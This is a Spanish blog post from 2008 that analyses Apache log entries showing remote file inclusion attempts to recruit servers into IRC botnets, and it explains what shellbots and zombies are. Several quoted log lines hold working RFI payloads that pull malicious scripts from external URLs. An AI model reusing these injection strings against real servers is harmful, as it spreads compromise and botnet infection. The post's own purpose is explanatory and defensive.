BotNets!
Lunes, Junio 9th, 2008Anoche un amigo y yo nos aburriamos y ya que ambos tenemos nuestras páginas en un server propio en casita decidimos echarle un ojo a nuestros registros de apache:
# grep txt access.log | grep -v robots
Al resultado de ejecutar esta busqueda aparecieron numerosas peticiones GET con el contenido ‘txt’ en su interior que llamaban a archivos que no estaban en mi directorio web, si no que eran intentos en su gran mayoría de convertir a un host en un zombie para alguna BotNet mediante algun bug RFI.
Las BotNets (o Red de bots o robots) son comunmente servidores bien privados bien públicos de IRC (Internet Relay Chat) que se emplean como HUBs de Zombies que normalmente se encuentran bajo las órdenes del script kiddie mas inútil que puedas encontrarte.
Un Zombie es una máquina que ha sido comprometida y que ejecuta código malicioso a la espera de instrucciones de su dueño (el “hacker”). Los Zombies que suelen conectar y formar BotNets corren un programa script (mayormente perl) que simula ser una persona que se conecta a un IRC específico y que cumple instrucciones de una determinada persona, normalmente identificada por el nick (pseudónimo) o por el host (Dirección IP).
Estos programas reciben el nombre de Shellbot, ya que son Bots que ejecutan instrucciones en la shell de la maquina víctima.A continuación pongo y enlazo mirrors de algunos bots y RFIs para infectar máquinas que he encontrado en la búsqueda anteriormente descrita:
- 201.130.79.46 - - [05/Apr/2008:19:22:03 +0200] “GET /admin/addons/archive/archive.php?adminfolder=http://w0rms.by.ru/ddos.txt? HTTP/1.1″ 404 539 “-” “libwww-perl/5.79″ “-” [mirror] (ShellBot)
- 72.36.179.98 - - [06/May/2008:01:52:29 +0200] “GET /blog/descargas/bot.txt/port.php?content=http://www.cdpm3.com/id.txt? HTTP/1.1″ 404 539 “-” “libwww-perl/5.810″ “-” [mirror] (RFI)
- 77.48.71.72 - - [08/Jun/2008:16:02:10 +0200] “GET /blog/descargas/bot.txt/port.php?content=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1″ 404 539 “-” “libwww-perl/5.79″ “-” [mirror] (RFI)
- 69.59.184.132 - - [09/Jun/2008:04:16:18 +0200] “GET //viewtopic.php?p=762//viewtopic.php?p=45339//html&highlight=ü7.include($_GET[a]),exit.ü7&a=http://www.patrioticusa.us/poll/…/test2.txt? HTTP/1.1″ 404 308 “-” “Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)” [mirror] (RFI)
- De leer este archivo (el anterior) sale el texto $url.’superscanner2.txt’, se copia el nombre del archivo en la url quedando http://www.patrioticusa.us/poll/…/superscanner2.txt. [mirror] (ShellBot)
Algunos jaquers infectan directamente con un shellbot, otros ejecutan un php para que luego este último ejecute el shellbot o un deface y los que menos saben programar simplemente suben un único script php como este que les deja ejecutar cuanto quieran siempre que PHP esté mal configurado y que se ve así:
A diario estos ataques se automatizan y se suceden ya que muchos de estos ShellBots actuan como gusanos, se copian en el public_html o www de un servidor al que hayan infectado y acto seguido escanean el mundo en busca de mas víctimas a las que infectar, y lo peor es que la gran mayoría de las botnets existentes se emplean para realizar ataques de denegación de servicio distribuidos (DDoS) por lo que hay que tener cuidado y cuidarse las espaldas si eres administrador de alguna página y/o servidor.
